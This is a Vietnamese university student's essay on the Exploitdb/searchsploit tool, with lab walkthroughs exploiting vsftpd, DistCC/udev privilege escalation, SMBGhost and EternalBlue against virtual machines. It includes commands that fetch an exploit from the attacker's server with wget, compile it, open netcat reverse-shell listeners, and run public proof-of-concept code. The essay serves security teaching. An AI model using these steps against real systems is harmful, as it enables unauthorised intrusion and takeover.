1. Trang chủ
  2. » Giáo án - Bài giảng

HỌC PHẦN: AN TOÀN MẠNG BÀI TIỂU LUẬN: Công cụ Exploitdb

45 35 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 45
Dung lượng 6,78 MB

Nội dung

HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THƠNG TIN HỌC PHẦN: AN TỒN MẠNG BÀI TIỂU LUẬN: Công cụ Exploitdb Giảng viên hướng dẫn: TS Đặng Minh Tuấn Nhóm mơn học: Nhóm 01 Tên sinh viên: Thân Trung Kiên Mã sinh viên: B18DCAT123 Hà Nội - 2021 MỤC LỤC DANH MỤC HÌNH ẢNH DANH MỤC BẢNG DANH MỤC THUẬT NGỮ TIẾNG ANH VÀ TỪ VIẾT TẮT LỜI MỞ ĐẦU I Giới thiệu Exploitdb .6 II Lịch sử phát triển Exploitdb III Cách cài đặt .8 IV Tổng quan cách sử dụng Tổng quan Cách sử dụng 11 Tìm kiếm (Basic search) .11 Tìm kiếm theo title (Title search) 11 Tìm kiếm đường dẫn (Path search) .12 Sao chép tới thư mục thời (Copy to directory) 13 Mở exploit (Examine an exploit) 13 Tìm kiếm exploit theo file output Nmap (Examining Nmap results) .14 Tìm kiếm online (Exploit-db online) .16 Loại bỏ kết không mong muốn 17 In danh sách kết dạng JSON 18 Tìm kiếm chế độ Case-sensitive (Case-sensitive search) .18 Tìm kiếm chế độ Strict (Strict search) 19 V Các lab .20 Khai thác service vsftpd .20 Leo thang đặc quyền cách khai thác lỗ hổng DistCC Udev (CVE-2004-2687 CVE-2009-1185) .23 Khai Thác Lỗi RCE SMBGHOST CVE-2020-0796 30 4.Khai thác lỗi SMB : CVE-2017-0144 (ETERNALBLUE) 37 KẾT LUẬN .41 TÀI LIỆU THAM KHẢO .42 DANH MỤC HÌNH ẢNH Hình 1.1 Giao diện CLI Searchsploit .6 Hình 2.1 Các mốc lịch sử phát triển Exploitdb Hình 3.1 Apt update cài đặt exploitdb Hình 4.1 Danh sách Options Hình 4.2 Kết Basic search 11 Hình 4.3 Kết Title search 12 Hình 4.4 Search với option -p 12 Hình 4.5 Kết search với option -m 13 Hình 4.6 Câu lệnh xem exploit 13 Hình 4.7 File Exploit 14 Hình 4.8 Kết sau scan Nmap 15 Hình 4.9 File result.xml 15 Hình 4.10 Kết search Exploits với file Nmap 16 Hình 4.11 Kết dùng option -w 16 Hình 4.12 Kết không dùng exclude 17 Hình 4.13 Kết dùng exclude .17 Hình 4.14 Kết kết hợp pipeline grep 18 Hình 4.15 Danh sách dạng JSON 18 Hình 4.16 Case-sensitive search 19 Hình 4.17 Strict search .19 Hình 5.1 Kết scan Nmap 21 Hình 5.2 File output Nmap 21 Hình 5.3 Searchsploit kết hợp nmap 22 Hình 5.4 Mở cơng cụ công 22 Hình 5.5 Mở mơ-đun cơng 23 Hình 5.6 Tấn công máy meta 23 Hình 5.7 Kết scan legion 25 Hình 5.8 Set option cho exploit distcc_exect 25 Hình 5.9 Tạo thành công reverse shell 26 Hình 5.10 Kiểm tra version Linux Ubuntu 27 Hình 5.11 Tìm exploit qua searchsploit 27 Hình 5.12 Sử dụng option -m để lưu copy exploit thư mục thời 27 Hình 5.13 File "run" 28 Hình 5.14 Khởi chạy Apache service 28 1|Page Hình 5.15 Tải file exploit wget qua webserver .28 Hình 5.16 Compile code exploit 29 Hình 5.17 Check PID netlink 29 Hình 5.18 Kết nâng quyền thành cơng 30 Hình 5.19 Tìm kiếm lỗ hổng 30 Hình 5.20 Rà quét dịch vụ port 32 Hình 5.21 Quét tìm lỗ hổng .33 Hình 5.22 Cấu hình file SMBleedingGhost.py 34 Hình 5.23 nc –lvp 4444 35 Hình 5.24 Thực thi lệnh máy thật win 10 36 Hình 5.25 Kết đạt .36 Hình 5.26 Rà quét cổng 445 38 Hình 5.27 Scanner lỗ lổng .39 Hình 5.28 Exploit lỗ hổng 40 Hình 5.29 Khai thác thành công 40 2|Page DANH MỤC BẢNG Bảng 4.1 Các tham số options Search terms Bảng 4.2 Các tham số options Output .10 Bảng 4.3 Các tham số options Non-searching (với tham số) 10 Bảng 4.4 Các tham số options Non-searching (không tham số) .10 Bảng 4.5 Các tham số options Automation .11 Bảng 5.1 Môi trường , kịch lab 20 Bảng 5.2 Môi trường kịch lab 24 Bảng 5.3 Môi trường kịch lab 31 Bảng 5.4 Môi trường kịch lab 38 3|Page DANH MỤC THUẬT NGỮ TIẾNG ANH VÀ TỪ VIẾT TẮT Từ tắt viết Thuật ngữ tiếng Anh/Giải thích FTP JSON IP Common Vulnerabilities Exposures File transfer protocol JavaScript Object Notation Internet protocol TCP Transmission control protocol URL XML XSS Uniform Resource Locator eXtensible Markup Language Cross site scripting RDP Remote Desktop Protocol CVE Thuật ngữ tiếng Việt/Giải thích and Các lỗ hổng rủi ro thường thấy Giao thức truyền file Định dạng liệu Giao thức Internet Giao thức điều khiển truyền vận Đường dẫn Ngôn ngữ đánh dấu mở rộng Chèn script Giao thức kết nối máy tính từ xa 4|Page LỜI MỞ ĐẦU Lĩnh vực CNTT lĩnh vực nóng với tiến vượt bậc cơng nghệ điện toán đám mây, bigdata, AI… bùng nổ việc ứng dụng internet vào thứ giúp có khả truy cập vào kho tài nguyên phong phú lúc nơi, giải trí, giảm thời gian tăng suất công việc Đi kèm với phát triển internet bảo mật vấn đề chiếm quan tâm nhiều người Trên giới diễn nhiều vụ lộ thông tin, công hệ thống, lừa đảo nhằm chiếm đoạt tiền Trong bối cảnh đó, cơng cụ Exploitdb đời nhằm mục đích cơng khai lỗ hổng exploit biết để từ người sử dụng nâng cao hiểu biết bảo vệ hệ thống cách tốt Chủ đề tiểu luận công cụ Exploitdb, từ tổng quan đến chi tiết, cách sử dụng số Lab liên quan tới công cụ 5|Page I Giới thiệu Exploitdb Exploitdb cơng cụ tích hợp sẵn máy ảo Kali Linux, có chức sở liệu chứa thông tin loại lỗ hổng exploit Cơng cụ lấy liệu từ trang web exploi-db.com exploit database repository Github Searchsploit cơng cụ để tiến hành tìm kiếm thơng tin tool Exploitdb, cơng cụ cho phép tạo copy sở liệu exploitdb Từ việc tìm kiếm trở nên dễ dàng thuận tiện máy không cần phải truy cập Internet mà tìm kiếm thông tin cần thiết thông qua copy sẵn Hình 1.1 Giao diện CLI Searchsploit 6|Page II Lịch sử phát triển Exploitdb - Exploitdb tạo vào khoảng đầu năm 2004 ex-hacker có tên “str0ke” Công cụ tạo nên sau exploit-source khác có tên “FrSIRT” chuyển hoạt động bí mật (trả phí) khơng cịn miễn phí - 8/7/2009, str0ke thơng báo trang web bị đóng Tuy vậy, nhu cầu lớn từ cộng đồng, anh công khai tuyên bố trang web hoạt động lại sau anh bàn giao dự án cho người khác - 4/11/2009, str0ke thức bàn giao lại sở liệu cho Offensive Security - 16/11/2009, trang web thức hoạt động trở lại tên miền exploidb.com Hình 2.1 Các mốc lịch sử phát triển Exploitdb 7|Page “192.168.1.111” địa máy công “12345” cổng mà lắng nghe máy cơng Hình 5.13 File "run" Tiếp đó, quay lại reverse shell với máy mục tiêu lấy file exploit máy để tiến hành nâng quyền Ở bước này, ta dùng wget trước apache service máy cơng phải bật Hình 5.14 Khởi chạy Apache service Sử dụng lệnh wget để lấy file với câu lệnh: wget http://192.168.1.111/run wget http://192.168.1.111/8572.c Hình 5.15 Tải file exploit wget qua webserver Kết thu file cần thiết cho việc exploit 28 | P a g e Sử dụng lệnh gcc để compile code Câu lệnh: gcc –o out 8572.c Hình 5.16 Compile code exploit Khi chạy file “out” script “run” thực thi tạo reverse shell với quyền root máy cơng có địa IP, PORT mà xác định trước file “run” Để chạy file “out” phải truyền vào Process ID (PID) udevd netlink socket Ta lấy PID cách chạy lệnh cat /proc/net/netlink PID có giá trị khác PID mà ta cần tìm kiếm Có thể xác nhận lại lệnh ps aux | grep udev PID kết trả lệnh lớn đơn vị so với kết lệnh Trong trường hợp PID ta cần tìm 2737 Hình 5.17 Check PID netlink Trước khai thác lỗ hổng lệnh /out 2405 ta cần phải khởi tạo listener máy công netcat: nc -lvp 12345 29 | P a g e Hình 5.18 Kết nâng quyền thành công Kiểm tra đặc quyền cách nhập whoami, kết trả “root” ta leo thang đặc quyền thành cơng Khai Thác Lỗi RCE SMBGHOST CVE-2020-0796 Sử dụng lệnh : searchsploit –w SMB để tìm lỗ hổng gây lỗi RCE SMBGHOST CVE-2020-0796 Hình 19 Tìm kiếm lỗ hổng 30 | P a g e Công cụ sử dụng Nmap Máy công Máy ảo Kali linux 64bit , Máy thật Win 10 Đối tượng Máy ảo Win 10 +Tiến hành rà quét dịch vụ chạy máy mục tiêu cơng cụ Nmap +Sau git clone máy kali để thêm file cve-2020-0796-scanner.py để tiến hành xác định Kịch xem máy ảo win 10 có lỗ hổng khơng +Trên máy thật win 10 tải file CVE-2020-0796RCE-POC để thực công +Chạy file SMBleedingGhost.py để thực exploit máy win 10 ảo Thực thi công, gây lỗi reset máy , đánh cắp Mục tiêu sau công liệu máy ảo win 10 Bảng Môi trường kịch lab Bước : Tiến hành rà quét Nmap công cụ quét dịch vụ mở máy cụ thể máy Win dịch vụ port TCP/445 quét 31 | P a g e Hình 20Rà quét dịch vụ port Bước 2:Git clone https://github.com/ButrintKomoni/cve-2020-0796 máy kali Sau git clone thành công thực thi câu lệnh python3 cve-20200796-scanner.py 192.168.1.117 để quét máy ảo win 10 xem có lỗ hổng CVE 2020 -0796 hay khơng Vulnerable : có lỗ hổng 32 | P a g e Hình 21Quét tìm lỗ hổng Bước : git clone https://github.com/ZecOps/CVE-2020-0796-RCE-POC máy kali để cấu hình file SMBleedingGhost.py Sau thực thi lệnh nc –lvp 4444 máy kali để ncat hiển thị trình bao cung cấp quyền truy cập hệ thống vào máy tính mục tiêu 33 | P a g e Hình 22Cấu hình file SMBleedingGhost.py 34 | P a g e Hình 23nc –lvp 4444 Bước : Tải file CVE-2020-0796-RCE-POC-master.zip https://github.com/ZecOps/CVE-2020-0796-RCE-POC cho máy thật win 10 Sau tải thành công thực thi lệnh “SMBleedingGhost.py 192.168.1.117 192.168.1.111 4444” cmd để exploit máy ảo win 10 35 | P a g e Hình 24Thực thi lệnh máy thật win 10 Kết đạt : Máy ảo win 10 bị reset Hình 25Kết đạt Cách phịng chống : lệnh PowerShell (run as Administrator) không cần khởi động lại: Mở powershell run as administrator run lệnh: 36 | P a g e Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value –Force gpupdate /force Hoặc tắt port 445 máy chủ hay sử dụng firewall để chặn port không sử dụng 4.Khai thác lỗi SMB : CVE-2017-0144 (ETERNALBLUE) SMB: CVE-2017-0144 là lỗi giao thức Server Message Block (viết tắt SMB) Nó có tên gọi khác ”Lỗ hổng bảo mật thực thi mã từ xa giao thức SMB hệ điều hành Windows” SMB: CVE-2017-0144 phát lần vào ngày 16/03/2017 máy chủ có giao thức Microsoft Server Message Block 1.0 (SMBv1) SMBv1 đánh giá lỗi thời, nhiên tự động mặc định kích hoạt nhiều máy chủ Windows, khiến đích đến cho công an ninh mạng Sự nguy hiểm SMB: CVE-2017-0144: Lỗi bảo mật SMB: CVE-2017-0144 vô nguy hiểm Khi máy tính dính phải lỗi này, hệ thống máy chủ gặp phải phần mềm độc hại ransomware, nhờ vào kẻ công lợi dụng để tống tiền nạn nhân Công cụ sử dụng Nmap Máy công Máy ảo Kali linux 64bit Đối tượng Máy ảo Win Kịch +Tiến hành rà quét dịch vụ chạy máy mục tiêu cơng cụ Nmap +Sử dụng search enternalblue để tìm kiếm modules khai thác lỗ hổng 37 | P a g e +Scan xem có lỗ hổng khơng + Tiến hành exploit lỗ hổng Mục tiêu sau cơng Thực thi công, chiếm quyền admin máy nạn nhân Bảng Môi trường kịch lab Bước : Sử dụng lệnh “Searchsploit –w eternalblue” để tìm kiếm lỗi : Hình 20 : Tìm kiếm lỗ hổng Bước : Rà quét cổng 445/tcp Nmap Hình 5.26 Rà quét cổng 445 Bước :Sử dụng metasploit framework để khai thác Sử dụng lệnh”msfconsole” để mở cơng cụ metasploit framework Tiếp sử dụng lệnh “search EternalBlue” để mở module 38 | P a g e Sử dụng lệnh use để sử dụng module scanner lỗ hổng Hình 27Scanner lỗ lổng Sử dụng lệnh “use 2” để tiến hành exploit lỗ hổng 39 | P a g e Hình 28 Exploit lỗ hổng Khai thác lỗ hổng thành công chiếm quyền admin Hình 5.29 Khai thác thành cơng Từ điều khiển máy nạn nhân , khai thác liệu ,… Cách phòng chống: Tắt port 445/tcp , mở tường lửa , tắt dịch vụ RDP 40 | P a g e KẾT LUẬN Qua tiểu luận trên, em trình bày khái niệm tổng quan, đến chi tiết cách sử dụng Lab liên quan tới công cụ Exploitdb Bài tiểu luận cịn có nhiều sai sót, mong Thầy bạn đọc đóng góp ý kiến để hồn thiện Em xin cảm ơn! 41 | P a g e TÀI LIỆU THAM KHẢO [1] [Online] Available: https://www.hackingarticles.in/comprehensive-guide-onsearchsploit/ [2] [Online] Available: https://www.geeksforgeeks.org/finding-exploit-offline-usingsearchsploit-in-kali-linux [3] [Online] Available: https://www.exploit-db.com [4] [Online] Available: https://cuongquach.com/nmap-la-gi-cong-cu-quet-mang.html [5] [Online] Available: https://www.totolink.vn/article/154-giao-thuc-ftp-la-gi-nhung-dieuban-chua-biet-ve-giao-thuc-ftp.html [6] [Online] Available: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-20042687 [7] [Online] Available: https://www.exploit-db.com/docs/8572 42 | P a g e ... hệ thống cách tốt Chủ đề tiểu luận công cụ Exploitdb, từ tổng quan đến chi tiết, cách sử dụng số Lab liên quan tới công cụ 5|Page I Giới thiệu Exploitdb Exploitdb cơng cụ tích hợp sẵn máy ảo Kali... dịch vụ RDP 40 | P a g e KẾT LUẬN Qua tiểu luận trên, em trình bày khái niệm tổng quan, đến chi tiết cách sử dụng Lab liên quan tới công cụ Exploitdb Bài tiểu luận cịn có nhiều sai sót, mong Thầy... exploit Cơng cụ lấy liệu từ trang web exploi-db.com exploit database repository Github Searchsploit cơng cụ để tiến hành tìm kiếm thơng tin tool Exploitdb, cơng cụ cho phép tạo copy sở liệu exploitdb

Ngày đăng: 09/02/2022, 14:00

TỪ KHÓA LIÊN QUAN

TRÍCH ĐOẠN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w